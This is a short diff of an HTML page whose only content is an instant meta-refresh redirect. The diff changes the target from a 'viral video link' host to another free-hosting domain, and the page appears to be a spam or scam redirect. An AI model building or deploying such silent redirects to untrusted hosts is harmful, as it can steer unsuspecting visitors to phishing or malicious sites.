--- a/xxx/xxx.html
+++ b/xxx/xxx.html
@@ -1,7 +1,7 @@
 <!DOCTYPE html>
 <html>
 <head>
-    <meta http-equiv="refresh" content="0; url=https://skviralvideolink.kesug.com">
+    <meta http-equiv="refresh" content="0; url=http://xsnn.free.nf/">
 </head>
 <body>
 </body>
